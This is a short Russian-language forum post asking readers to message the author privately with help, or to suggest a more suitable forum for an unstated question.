Напишите пожалуйста в личку кто может помочь, или подскажите пожалуйста на каком форуме этот вопрос уместно задать.

Спасибо!